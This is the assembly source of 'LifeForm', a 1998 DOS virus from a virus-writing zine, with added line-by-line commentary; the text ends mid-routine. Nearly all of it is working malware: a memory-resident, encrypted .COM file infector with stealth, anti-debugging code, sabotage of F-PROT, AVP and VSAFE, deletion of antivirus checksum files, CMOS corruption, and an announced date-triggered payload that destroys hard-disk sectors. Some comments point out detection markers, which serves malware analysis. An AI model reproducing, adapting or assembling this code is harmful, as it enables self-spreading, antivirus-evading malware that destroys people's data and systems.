The LifeForm virus
H0l0kausT Issue 1
; Virus Name: LifeForm
; Author : ThE_WiZArD
; Origin : Spain, 1998.
; Length : 2101 bytes approx.
;
;
;
;┌────────────┐
;│ Features   │
;└────────────┘
;
; -Memory Resident (MCB) Encrypted parasitic virus.
; -Infects .COM files on Closing (3EH).
; -Full Stealth (disinfection on OPEN (3Dh) & DEBUGGING (4B01h), and reinfection
; on CLOSE (3Eh) ).
; -FCB & DTA Stealth (sec = 62)
; -Time Stealth (AX=5700h), returns correct seconds.
; -Uses SFT`s to perform infection (less size and fuck TSR watchdogs).
; -Redirects Int03h to Int21h (less size and fuck debuggers).
; -Hook Int 24h to a dummy handler to hide errors.
; -Anti-Debug , Emulation and Anti-Heuristic Code.
; -Turns off VSAFE`s flags while infecting files and restore them later.
; -Breaks F-PROT's ability of detecting viruses (Thx to Wintermute)
; -When the AVPLITE anti-virus is executed, the virus modifies the command line
; so that heuristic analysis stays disabled.
; -Disables stealth when a compression utility is running.
;
; -Delete CRC Checksums ( In current DIR )
;
; -> anti-vir.dat
; -> avp.crc
; -> chklist.tav
; -> chklist.ms
; -> ivb.ntz
; -> smartchk.cps
;
; On 23rd May it destroys random sectors of the hard disk and the CMOS, and displays
; a "funny" payload message.
;
;
;
;Thx go to: 29A staff.
;
;Fucks go to: Well , they know who they are.
;
;
;
; ThE_WiZArD
; wizard555@hotmailcom
;
;
;-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
;
; To assemble: TASM /M LifeForm.ASM
; TLINK LifeForm
; EXE2COM LifeForm.EXE LifeForm.COM
.286
; TASM/Intel syntax, 16-bit real-mode .COM image; all code is position
; dependent on BP (the "delta offset") because the body lands at a different
; offset in every host.
LifeForm segment byte public
assume cs:LifeForm,ds:LifeForm
org 0h
LifeForm_size equ (LifeForm_end-LifeForm_start) ;Full image incl. Buffer (resident copy)
Crypt_Size equ (Crypt_End-Crypt_Start) ;Bytes covered by the XOR layer
Size_SB equ (Size_Sin_Buffer-LifeForm_Start) ;Bytes actually appended to a host (no Buffer)
LifeForm_start label byte
; Delta_ofs names the 16-bit immediate of the following MOV; Infect_COM
; overwrites it with (host size + 100h) so BP = offset of the body in the host.
Delta_ofs equ word ptr $+1
mov bp,0100h ;Delta offset (precalc)
cli
neg sp ;Mess with Stack
neg sp ;Two NEGs cancel out: net no-op, only there to trip emulators (TBCLEAN)
sti
;*****************************************************************************
; ANTI-HEURISTIC DECRYPTOR *
;*****************************************************************************
;-----------------------------------------------------------------------
; Decrypt: in-place XOR of [Crypt_Start,Crypt_End) in the host image.
; In:    bp = delta offset
; Out:   falls into Crypt_Start via the RET (SI was pushed as return addr)
; Clobb: ax, bx, si, di, flags
; The 0000h immediate below is a placeholder: Gen_KEY rewrites the first
; instruction of Xor_LOOP as "xor word ptr cs:[di],KEY" before each copy is
; written, so every infected file carries a different key.
;-----------------------------------------------------------------------
Decrypt:
lea si,[bp+offset Crypt_Start]
mov di,si
push si ;Return address for the final RET = Crypt_Start
xor ax,ax ;ax = word counter
mov bx,Crypt_size/2+2 ;Loop bound (inclusive, see JBE)
Xor_LOOP:
xor word ptr cs:[di],0000h ;XOR It ! (immediate patched at infection time)
nop
int 3h ;Executed once per word; a debugger owning INT 3 is disturbed
inc ax
jmp Fuck_TBAV2 ;Control flow deliberately scrambled across three jumps
Fuck_TBAV1:
jmp Fuck_TBAV3
Fuck_TBAV2:
add di,2h
jmp Fuck_TBAV1
Fuck_TBAV3:
cmp ax,bx ;Are we at the end?
jbe Xor_Loop ;No .. continue
ret ;"Returns" to the pushed SI, i.e. to the now-decrypted body
Crypt_Start label byte
;*****************************************************************************
; FOOL TRACING / EMULATION *
;*****************************************************************************
;-----------------------------------------------------------------------
; No_Trace: single-step (TF) detector.
; push -1 / inc sp / dec sp / pop ax should give ax = -1, so inc ax sets ZF.
; If a trap handler runs between inc sp and dec sp it pushes its frame
; over the word just pushed, the test fails and execution falls through to
; the CMOS/halt/reboot path below.
;-----------------------------------------------------------------------
No_Trace:
cli
push ax ;Anti-Trace routine !
push -1 ;TBCLEAN catch this ;-)
inc sp
dec sp
pop ax
inc ax ;ZF set only if the pushed -1 survived intact
pop ax
jz Check_for_TSR
mov al,2Eh ;CMOS: 2EH -> Checksum
out 70h,al ;Corrupt Checksum (writes index value into the data port)
out 71h,al
hlt ;Halt computer
int 19h ;Reboot
;*****************************************************************************
; CHECK FOR NOVELL AND TSR *
;*****************************************************************************
;-----------------------------------------------------------------------
; Check_for_TSR: residency check. AX=':?' (3A3Fh) is not a DOS function;
; the resident handler (Tsr_Check) answers with BX=':*'. This call/response
; pair is a usable detection signature for the resident copy.
;-----------------------------------------------------------------------
Check_for_TSR:
mov ax,':?' ;Check for TSR ...
int 21h
cmp bx,':*' ;Are we already
jne Install_MCB ;memory resident ?
jmp Return_File
LifeForm_LiveS db '#ThE_WiZArD' ;Of Course (author string, never referenced by code)
;*****************************************************************************
; ROUTINE TO GO TSR *
;*****************************************************************************
;-----------------------------------------------------------------------
; Install_MCB: go resident by carving a block off the top of the program's
; own MCB instead of using the DOS TSR services.
; In:    bp = delta offset, ds = PSP segment
; Side effects: shrinks the host's MCB (+3 size) and PSP top-of-memory
; (PSP +2 = MCB +12h), creates a new 'Z' MCB marked as owned by "DOS", and
; copies LifeForm_Size bytes into it. Falls into Set_int21h.
;-----------------------------------------------------------------------
Install_MCB:
mov al,21h ;Get Int21h
call Get_Int
mov word ptr cs:[OldInt21h][bp],bx ;Save Int21h
mov word ptr cs:[OldInt21h+02h][bp],es
mov ax,ds
dec ax
mov ds,ax ;Program's MCB segment
xor di,di
cmp byte ptr ds:[di],'Y' ;Is it a Z block? ('Z' > 'Y' = last block in chain)
ja MCB_OK ;YES !!
jmp Return_File ;No .. Exit ..
MCB_OK:
sub word ptr ds:[di+3],((LifeForm_Size/10h)+2) ;Shrink host block (paragraphs)
sub word ptr ds:[di+12h],((LifeForm_Size/10h)+2) ;Shrink PSP top-of-memory field too
add ax,word ptr ds:[di+3]
inc ax
mov ds,ax ;ds = segment of the new (stolen) MCB
mov byte ptr ds:[di],'Z' ;Mark block as Z
mov word ptr ds:[di+1],8 ;System memory (owner PSP = 8)
mov word ptr ds:[di+3],((LifeForm_Size/10h)+1)
mov word ptr ds:[di+8],4f44h ;Mark block as owned
mov word ptr ds:[di+0ah],0053h ;by DOS (444f53h,0) -> shows as "DOS" in MEM listings
inc ax
cld
push cs
pop ds
mov es,ax ;es = first paragraph after the new MCB
mov cx,LifeForm_SiZe ;Copy virus to memory
mov si,bp
rep movsb
;*****************************************************************************
; SET INTERRUPTION 21H *
;*****************************************************************************
;-----------------------------------------------------------------------
; Set_int21h: point INT 21h at the resident copy (vector written directly,
; not via DOS 25h). Return_File / Exit_COM then rebuild the first 4 bytes
; of the host at 100h from HEADER, zero the registers and RET to 100h.
; In:    es = resident segment, bp = delta offset
;-----------------------------------------------------------------------
Set_int21h:
push es
pop ds ;ds = resident segment so OldInt21h/Int21h_LifeForm resolve there
mov al,21h
mov dx, offset Int21h_LifeForm
call Set_Int ;Set new Int21h
Return_File:
push cs cs
pop ds es
Exit_COM:
mov bx,bp
lea si,HEADER
add si,bx ;si = HEADER + delta (original first 4 host bytes)
mov ax,100h
xchg ax,di ;di = 100h, ax = old di
push di ;Return to program ...
movsw ;Copy four bytes
movsw
Reset_Reg:
xor ax,ax
sub bx,bx ;Set registers to 0
mov cx,bx
mov dx,bx
xor di,cx ;di ^= 0 -> unchanged (di = 104h here)
sub si,di
xor bp,bp
ret ;Return to host (pops the 100h pushed above)
;*****************************************************************************
; FCB STEALTH *
;*****************************************************************************
;-----------------------------------------------------------------------
; Fcb_Stealth: post-processing of FCB FindFirst/FindNext (AH=11h/12h).
; Only acts when the caller's PSP equals its parent PSP (PSP:16h), which the
; author uses as "COMMAND.COM is the caller". For directory entries whose
; extension starts with "CO" and whose time has the 62-second marker
; (seconds field = 1Fh), the marker is cleared and Size_SB is subtracted
; from the reported size, hiding the appended body from DIR.
;-----------------------------------------------------------------------
Fcb_Stealth:
pushf
call dword ptr cs:[OldInt21h] ;Call to INT 21h
test al,al ;Error ?
jnz fcb_out ;Jmp if error
call push_all
mov ah,51h ;Get current psp
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
mov es,bx ;Es=segment of psp
cmp bx,es:[16h] ;psp of COMMAND.COM? (PSP:16h = parent PSP)
jnz fcb_out1 ;no, then jmp
mov bx,dx ;DS:BX=FCB
mov al,[bx] ;1st byte of fcb
push ax ;save it
mov ah,2fh ;get DTA in ES:BX
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7
Fcb_old:
cmp word ptr es:[bx+09h],'OC' ;Extension starts with "CO" (only 2 chars checked)
jne Fcb_out1
mov al,es:[bx+17h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh ;62 seconds ?
jnz fcb_out1
and byte ptr es:[bx+17h],0E0h ;Erase erronous sec.
Fcb_SUB:
sub word ptr es:[bx+1dh],Size_SB ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;Sub with carry flag
Fcb_out1:
call pop_all ;Restore registers
Fcb_out:
iret ;Return control
;*****************************************************************************
; NEW INTERRUPT 21h *
;*****************************************************************************
;-----------------------------------------------------------------------
; Int21h_LifeForm: resident INT 21h front end.
; 1. Same TF-trap check as No_Trace; a failed check just IRETs.
; 2. Answers the ':?' residency probe with BX=':*'.
; 3. Dispatches on AH/AX to the stealth, disinfection and infection
;    routines; everything else falls through to ExitInt21h.
; ExitInt21h is a far JMP (opcode EAh) whose operand IS the OldInt21h
; storage, so the original handler is entered with the caller's stack.
;-----------------------------------------------------------------------
Int21h_LifeForm:
cli
push ax ;Anti-Trace routine !
push -1 ;Kasp :-P
inc sp
dec sp
pop ax
inc ax
pop ax
jz Tsr_Check
iret ;Traced: silently drop the call
Tsr_Check:
sti
cmp ax,':?' ;Check for TSR ?
jnz Int21h_Check
mov bx,':*' ;Return :* !
iret
Int21h_Check:
xchg ax,bx ;bx = function (AH in BH), ax = caller's bx
cmp bh,11h ;FCB Stealth
je STEALTH_fcb
cmp bh,12h
je STEALTH_fcb
cmp bh,4Eh ;HANDLE Stealth
je STEALTH_Hnd
cmp bh,4Fh
je STEALTH_Hnd
cmp bx,4b00h ;DELETE CrC shit
je Delete_Shit
cmp bx,4b01h ;DISINFECT File
je Disinfection
cmp bh,3Dh ;DISINFECT File
je Disinfection
cmp bh,6Ch ;DISINFECT File
je Disinfection
cmp bx,5700h ;HIDE Erroneous sec.
je STEALTH_Sec
cmp bh,3fh ;Fuck F-PROT
je Stealth_READ
cmp bh,3Eh ;INFECT File
je Infection
xchg ax,bx
ExitInt21h:
db 0eah ;Exit ... (JMP FAR, operand = OldInt21h below)
Oldint21h dw ?,? ;Original Int 21h
Oldint24h dw ?,? ;Original int 24h
OldInt03h dw ?,?
Newint24h:
mov al,3 ;Return error in
iret ;function (critical-error handler: always "fail")
Stealth_FCB:
xchg ax,bx
jmp FCB_Stealth
Stealth_HND:
xchg ax,bx
jmp HANDLE_Stealth
Stealth_READ:
xchg ax,bx
jmp Shit_F_PROT
Delete_Shit:
xchg ax,bx
jmp Check_Names
Disinfection:
xchg ax,bx
jmp disinfect_file
Infection:
xchg ax,bx
jmp Infect_File
;****************************************************************************
; DATE/TIME STEALTH *
;****************************************************************************
;-----------------------------------------------------------------------
; Stealth_Sec: AX=5700h (get file time). Calls the original handler and
; returns with retf 2 so the caller's flags reflect CF set here.
; When the seconds field already equals 1Fh the code ORs 1Fh back into CL,
; which leaves the value unchanged; the header's claim of "returns correct
; seconds" is not what this code does — documented as-is.
;-----------------------------------------------------------------------
Stealth_Sec:
xchg ax,bx
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc ok_get_time
stc
retf 02h ;Propagate the error with CF set
ok_get_time:
push cx
and cx,1fh ;Unmask second field
xor cx,1fh ;62 seconds ?
pop cx
jne exit_get_time
or cl,01fh ;Changes seconds (no-op here: low 5 bits are already 1Fh)
exit_get_time:
clc
retf 02h
;*****************************************************************************
; HANDLE STEALTH *
;*****************************************************************************
;-----------------------------------------------------------------------
; Handle_Stealth: post-processing of FindFirst/FindNext (AH=4Eh/4Fh).
; Skipped when the calling program's MCB owner name (see Get_Env) starts
; with one of the listed pairs: note the word constants are byte-swapped,
; so "-F" matches "F-" (F-PROT), "RA" matches "AR" (ARJ), etc.
; For DTA entries carrying the 62-second marker, Size_SB is subtracted from
; the size at DTA+1Ah and the seconds bits are masked (0F1h).
;-----------------------------------------------------------------------
Handle_Stealth:
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc Handle_OK
stc
retf 02h
Handle_OK:
call push_all ;Push this shit !
call get_env ;ax = first two chars of the caller's MCB owner name
cmp ax,"-F" ;F-PROT (Fuck POTATOE)
jz not_infected
cmp ax,"RA" ;ARJ
jz not_infected
cmp ax,"AR" ;RAR
je not_infected
cmp ax,"KP" ;PK*
je not_infected
cmp ax,"HL" ;LHA
je not_infected
cmp ax,"AB" ;BACKUP
je not_infected
mov ah,2Fh ;get DTA
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
mov al,es:[bx+16h] ;Get file time stamp (DTA+16h)
and al,1fh ;Unmask seconds field
xor al,1fh
jnz not_infected
sub word ptr es:[bx+1ah],Size_SB ;Subs virus size (DTA+1Ah = size)
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds (mask 0F1h clears bits 1..3 only)
not_infected:
call pop_all ;Restore registers
retf 02h
;*****************************************************************************
; MAKE "F-PROT" DOESNT DETECT ANY VIRUS *
;*****************************************************************************
Avers db 'Quo vadis Fridrik? ... and you Frans still working on this shit.'
; Breaks F-prot's ability of detecting viruses: when it reads data from a
; file the virus sends the interrupt vector table , so F-prot doesn't
; detect any virus (Thx to Wintermute)
;-----------------------------------------------------------------------
; Shit_F_PROT: AH=3Fh (read) hook. Conditions: AL != 1, handle BX = 8, and
; the caller's MCB owner name starts with "F-". The real read is performed,
; then CX bytes from 0000:0000 (the IVT) are copied over the caller's
; buffer at DS:DX, so the scanner never sees real file contents.
;-----------------------------------------------------------------------
Shit_F_PROT:
call push_all
cmp al,1
jz Exit_READ
cmp bx,8 ;Only handle 8
jnz Exit_READ
call get_env
cmp ax,"-F" ;F-PROT ?
jnz Exit_READ
call pop_all
pushf
call dword ptr cs:[Oldint21h] ;Real read first (cx = requested count)
call push_all
push ds dx
pop di es ;Send interrupt
xor si,si ;vector table
mov ds,si ;ds:si = 0000:0000
rep movsb ;Overwrite the caller's buffer with CX bytes of IVT
call pop_all ;Quo Vadis Fridrik ?
retf 2
Exit_READ:
call pop_all
jmp ExitInt21h
;*****************************************************************************
; RUTINE TO INFECT *
;*****************************************************************************
;-----------------------------------------------------------------------
; Infect_File: AH=3Eh (close) hook — infection entry point.
; Everything below goes through INT 03h, which Set_Int03h points at
; Call_Int21h, so no INT 21h instruction appears in the infection path.
; Sequence: dup+close the handle (flush dir entry), locate the SFT entry,
; check extension/size/marker/name, save SFT mode/attr/position, read the
; first 4 bytes into HEADER, reject EXE / INT 20h / 90h headers, patch the
; delta offset, JMP target and decryptor key, encrypt a copy into Buffer,
; append it, write the 4-byte JMP, then restore the SFT fields and the
; original timestamp (with the 62-second marker, see Check_Infect).
; SFT offsets used: +02h mode, +04h attr, +11h size, +15h/+17h position,
; +20h name, +28h extension.
;-----------------------------------------------------------------------
Infect_File:
cmp bx,4h ;Erroneous handle ?
ja Infect_OK
jmp ExitInt21h ;Bye Bye .. !
Error: jmp Exit
Infect_OK:
call push_all ;Save this shit ;)
call Disable_KB ;Disable Keyboard
call Set_Int03h ;Set NewInt03h
call Vsafe_off ;Turn off Vshit ;)
mov ah,45h
int 03h ;Duplicate handle
Close_Cont:
xchg bx,ax
push ax
mov ah,3Eh ;Close new handle in
int 03h ;order to update
pop bx ;directory entry
call Get_SFT ;Get Da`SFT
Check_File:
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ? (only "CO" is checked)
jnz Error
Check_Size:
cmp word ptr es:[di+11h],0F63Bh ;It is > 63k ?
ja Error
call Check_Infect ;It is infected ?
jc Error
Check_COMM:
mov ax,word ptr es:[di+20h] ;COMMAND.COM ?
cmp ax,'OC'
jnz Save_Stuff
mov ax,word ptr es:[di+22h]
cmp ax,'MM'
jz Error
Save_Stuff:
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx
xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax
push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position
in ax,40h ;Get Encryption KEY (PIT counter port, used as a random source)
or ax,ax
jnz Key_OK
inc ax ;Never use key 0 (would leave the body in clear)
Key_Ok:
mov word ptr cs:[Clave],ax ;Save key
Read_Header:
call Lseek_START
push cs
pop ds ;CS=DS
mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4h bytes
int 03h
Check_Header:
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jne Infect_COM
jmp Restore
Infect_COM:
cmp word ptr cs:[Header+00h],20CDh ;Int20h Instruction ?
jz Restore ;Exit !
cmp byte ptr cs:[Header+00h],90h ;InVircible bait?
jz Restore ;Exit !
call Lseek_END ;ax = file size
mov delta_ofs,ax ;Store Delta Offset
add delta_ofs,100h ;bp will equal size+100h in the host
sub ax,3h
mov word ptr cs:[jump_address+1],ax ;Set the JMP Address
push di bx es cs ;Save Stuff
pop es ;CS=ES
cld
mov di,offset XOR_LOOP ;DI= Our Buffer
mov word ptr es:[DI],812Eh ;XOR WORD PTR CS:
inc di
inc di
Gen_INDEX_DI:
mov byte ptr es:[DI],35h ;[DI]
inc di
Gen_KEY:
mov ax,word ptr cs:[Clave] ;Move the decryption
stosw ;KEY (the resident copy's decryptor now carries this key)
call Copy&Crypt ;Copy & Encrypt virus
pop es bx di
call Lseek_END
call Set_Int24h ;Set NewInt24h
mov ah,3Fh ;Write Virus
inc ah
lea dx,Buffer ;Encrypted virus
mov cx,Size_SB ;Virus size
int 03h
jc Restore
call Lseek_START
mov ah,3Fh
inc ah
lea dx,Jump_Address ;Write JMP
mov cx,4h
int 03h
call Rest_Int24h
Restore:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position
pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute
pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode
call Res_Stuff ;Re-apply timestamp (marker set by Check_Infect)
Exit:
call Vsafe_on
call Rest_Int03h
call Enable_KB
call pop_all ;Restore this shit !
jmp ExitInt21h ;Exit ...
;****************************************************************************
; DISINFECTION *
;****************************************************************************
;-----------------------------------------------------------------------
; Disinfect_file: AH=3Dh / AH=6Ch / AX=4B01h hook. Opens the named file,
; and if it carries the marker, restores the original 4 header bytes
; (kept as the last 4 bytes of the appended body), truncates the body and
; restores the original time (kept 6 bytes before the end). The file is
; re-infected on the subsequent close through Infect_File.
; In:    ds:dx (or ds:si for 6Ch) = filename
;-----------------------------------------------------------------------
Disinfect_file:
call push_all ;Save this shit ;-)
call Set_Int03h
cmp ax,6c00h ;Extended open ?
jz extended
mov si,dx
Extended:
mov di,ds
call Vsafe_Off ;Turn OFF Vshit
Open_Dsf:
mov ds,di ;Opens the file !
mov dx,si
xor cx,cx
mov ax,3D00h
int 03h
jnc Open_OK
jmp Exit
Open_OK:
call Set_Int24h
xchg ax,bx
call get_sft ;Get Da`SFT
jc Error_Dsf
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error_Dsf
Check_Inff:
call Check_Infect ;Is it infected ?
jc Save_This
Error_Dsf:
jmp Exit_Close
Save_This:
call Disable_KB
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx
xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax
push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position
push cs ;CS=DS
pop ds
call Lseek_START
mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4 bytes
int 03h
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jz Rest_all
Read_OrigHeader:
mov ax,word ptr es:[di+11h] ;Get filesize
sub ax,4h ;Lseek 4 bytes before
mov word ptr es:[di+15h],ax ;end (HEADER is the tail of the body)
mov ah,3fh
mov cx,04h ;Read original header
lea dx,Header
int 03h
call Lseek_START
Write_OrigHeader:
mov ah,3fh ;Write original
inc ah ;Header
mov cx,4h ;COM header
lea dx,Header
int 03h
call Lseek_END ;ax = file size, needed by Res_Time&Lenght
call Res_Time&Lenght
Rest_all:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position
pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute
pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode
call Res_Stuff
Exit_Close:
mov ah,3eh ;Close file
int 03h
call Rest_Int24h
jmp exit
;*****************************************************************************
; ADD PARAMETERS TO COMMAND LINE OF AVP *
;*****************************************************************************
;-----------------------------------------------------------------------
; check_names: AX=4B00h (exec) hook. Compares the basename of the program
; being executed, backwards from the '.', against the 'AVPLITE' string
; (length byte stored after it, AV_scanner-1). On a match it appends the
; avplite_cmd text to the command tail in the exec parameter block
; (CX=9 bytes copied, tail count incremented by 8). Always continues into
; Delete_CrC afterwards.
; In:    ds:dx = program name, es:bx = parameter block
;-----------------------------------------------------------------------
check_names:
call push_all
mov si,dx
find_ext:
lodsb
cmp al,'.' ;Scan for the dot in
jne find_ext ;the filename
std ;Everything below walks backwards
lodsw ;si now points at the last basename char
xor cx,cx
mov di,offset AV_scanner - 1 ;Length byte of 'AVPLITE'
push cs
pop es
name_loop:
mov cl,byte ptr cs:[di] ;CS:DI = size of
dec di ;String
push si
repe cmpsb ;Compare the names
pop si
je found_name ;Found AVP ?
sub di,cx
cmp di,offset found_avplite
jbe tail_1_fail
jmp short name_loop
found_name:
cmp di,offset found_avplite ;AVPlite
jbe avplite_fix
jmp short tail_1_fail
avplite_fix:
cld ;Change command line
pop es ;Top of stack is the last register push_all saved (ds)
push es ;ES = param block
;Segment
mov di,word ptr es:[bx+2] ;Get command tail from
mov si,di ;Param block
mov ax,word ptr es:[bx+4]
mov es,ax
mov ds,ax ;Command tail!
inc di ;Increase till we are
;past tail count
cmp byte ptr [si],0 ;Any parameters ??
je avplite_tail
mov cx,127 ;Tail length
mov al,0dh
repne scasb ;Find the terminating CR
jne tail_1_fail
avplite_tail:
add byte ptr [si],8 ;Move our pointer?
push cs
pop ds
mov si,offset avplite_cmd ;AV param to add?
mov cx,9
rep movsb
tail_1_fail:
cld ;Ready to finish up?
call pop_all
jmp Delete_CrC
;****************************************************************************
; SAVE ALL REGISTERS IN THE STACK *
;****************************************************************************
;-----------------------------------------------------------------------
; Push_all / Pop_all: save/restore flags and all GPRs + ES/DS around a
; CALL. The return address is parked in the static word ret_off (in CS)
; while the registers are pushed/popped, so the pair is not reentrant —
; two interleaved uses would clobber each other's return address.
; Push order: flags, ax, bx, cx, dx, bp, si, di, es, ds (ds ends on top).
;-----------------------------------------------------------------------
Push_all:
cli
pop word ptr cs:[ret_off] ;Park our own return address
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push word ptr cs:[ret_off] ;Put it back on top and return through it
sti
ret
Pop_all:
cli
pop word ptr cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push word ptr cs:[ret_off]
sti
ret
ret_off dw 0000h ;Single shared slot for the parked return address
;*****************************************************************************
; GET SYTEM ENVIRONMENT *
;*****************************************************************************
;-----------------------------------------------------------------------
; Get_Env: identify the current program. AH=62h returns the active PSP in
; BX; the paragraph before it is that PSP's MCB, whose offset 8 holds the
; owner program name (DOS 4+). Returns its first two characters.
; Out:   ax = first two bytes of the MCB owner name, es = MCB segment
; Clobb: bx
;-----------------------------------------------------------------------
Get_Env:
mov ah,62h
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
dec bx ;bx = MCB of the current PSP
mov es,bx
mov ax,word ptr es:[0008h]
ret
;*****************************************************************************
; SET NEW INTERRUP 24h AND REDIRECT INT 21H OVER INT 03H *
;*****************************************************************************
;-----------------------------------------------------------------------
; Set_Int03h / Rest_Int03h: redirect INT 03h to Call_Int21h so the file
; I/O in the infection and disinfection paths can be issued as INT 03h
; (no INT 21h opcode on those paths), then restore the saved vector.
; Set_Int24h / Rest_Int24h: install Newint24h (always "fail") as the
; critical-error handler during writes so disk errors surface no prompt.
; All four preserve the registers they use; vectors are read/written
; directly through Get_int/Set_int, never via DOS 35h/25h.
;-----------------------------------------------------------------------
Set_Int03h:
push ax bx ds es cs
pop ds
mov al,03h ;Get Int03h
call get_int
mov word ptr ds:[OldInt03h],bx ;Save it
mov word ptr ds:[OldInt03h+02h],es
mov dx,offset Call_Int21h ;Redirects to Int21h
call set_int
pop es ds bx ax
ret
Rest_Int03h:
push ax dx ds
mov al,03h ;Restore Int03h
lds dx,dword ptr cs:[OldInt03h]
call set_int
pop ds dx ax
ret
Set_Int24h:
push ax bx ds es cs
pop ds
mov al,24h ;Get Int24h
call get_int
mov word ptr ds:[OldInt24h],bx ;Save it
mov word ptr ds:[OldInt24h+02h],es
mov dx,offset NewInt24h ;Redirect to a dummy
call set_int ;routine ;)
pop es ds bx ax
ret
Rest_Int24h:
push ax dx ds
mov al,24h ;Restore Int24h
lds dx,dword ptr cs:[OldInt24h]
call set_int
pop ds dx ax
ret
;*****************************************************************************
; RETURN THE <AL> VECTOR in <ES:BX> *
;*****************************************************************************
;-----------------------------------------------------------------------
; Get_int: read interrupt vector AL straight from the IVT (0000:AL*4),
; bypassing DOS 35h (and anything hooked on it).
; In:    al = vector number
; Out:   es:bx = current handler
; Clobb: flags (ax preserved)
;-----------------------------------------------------------------------
Get_int:
push ax
xor ah,ah
rol ax,1
rol ax,1 ;ax = vector * 4
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax
ret
;*****************************************************************************
; SET <AL> INTERRUPT VECTOR to <DS:DX> *
;*****************************************************************************
;-----------------------------------------------------------------------
; Set_int: write interrupt vector AL directly into the IVT under CLI,
; bypassing DOS 25h (and anything hooked on it).
; In:    al = vector number, ds:dx = new handler
; Clobb: flags (ax, bx, ds preserved)
;-----------------------------------------------------------------------
Set_int:
push ax
push bx
push ds
cli
xor ah,ah
rol ax,1
rol ax,1 ;ax = vector * 4
xchg ax,bx
push ds ;New segment, stored below
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax
ret
;*****************************************************************************
; LSEEK ROUTINES *
;*****************************************************************************
;-----------------------------------------------------------------------
; Lseek_START / Lseek_END: seek by writing the SFT position field
; (+15h) directly instead of calling AH=42h.
; In:    es:di = SFT entry
; Out:   Lseek_END also leaves ax = low word of the file size (+11h)
;-----------------------------------------------------------------------
Lseek_START:
mov word ptr es:[di+15h],00h ;Lseek to Start
ret
Lseek_END:
mov ax,word ptr es:[di+11h] ;File length
mov word ptr es:[di+15h],ax ;Lseek to end
ret
;*****************************************************************************
; ROUTINE TO GET SFT *
;*****************************************************************************
;-----------------------------------------------------------------------
; Get_SFT: resolve a file handle to its System File Table entry using the
; undocumented INT 2Fh DOS-internal calls 1220h (JFT entry for handle BX)
; and 1216h (SFT entry number BL).
; In:    bx = handle
; Out:   es:di = SFT entry, bx preserved; CF as set by INT 2Fh
;-----------------------------------------------------------------------
Get_SFT:
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)
mov ax,1216h ;Get System File Table
mov bl,es:[di] ;system file table entry
int 2fh ;(LIST) number
pop bx ;Restore the Handle
ret
;*****************************************************************************
; RUTINE CHECK INFECT *
;*****************************************************************************
;-----------------------------------------------------------------------
; Check_Infect: infection marker test and timestamp bookkeeping.
; Reads time/date from the SFT (+0Dh/+0Fh), keeps the untouched time in
; Org_time and the date in Old_date, and stores the time with the seconds
; field forced to 1Fh (= 62 seconds) in Old_time for Res_Stuff.
; Out:   CF=1 if the seconds field is already 1Fh (file carries marker)
; Clobb: cx, dx, flags
; The 62-second timestamp is the infection marker and is a practical
; detection indicator on disk.
;-----------------------------------------------------------------------
Check_Infect:
clc
mov cx,word ptr es:[di+0dh] ;Time from SFT
mov dx,word ptr es:[di+0fh] ;Date from SFT
mov word ptr cs:[org_time],cx ;Save original time
mov word ptr cs:[old_date],dx ;Save file date
or cl,1fh
mov word ptr cs:[old_time],cx ;Save file time (62s)
mov cx,word ptr cs:[org_time] ;Get original time
and cl,1fh
xor cl,1fh ;62 sec ?
jnz Ret_No ;File infected
stc
Ret_No:
ret
;*****************************************************************************
; RUTINE TO RESTORE STUFF *
;*****************************************************************************
;-----------------------------------------------------------------------
; Res_Stuff: AX=5701h (set file time/date) via INT 03h with the values in
; Old_time/Old_date — on infection this is the marked time, on
; disinfection the original time recovered by Res_Time&Lenght.
; In:    ds = cs, bx = handle
;
; Res_Time&Lenght: read the original time word stored 6 bytes before the
; end of the infected file into Old_Time, then truncate the file to
; (size - Size_SB) with a zero-length write.
; In:    ax = file size (from Lseek_END), es:di = SFT, bx = handle
;-----------------------------------------------------------------------
Res_Stuff:
mov cx,word ptr ds:[old_time] ;Restore file time
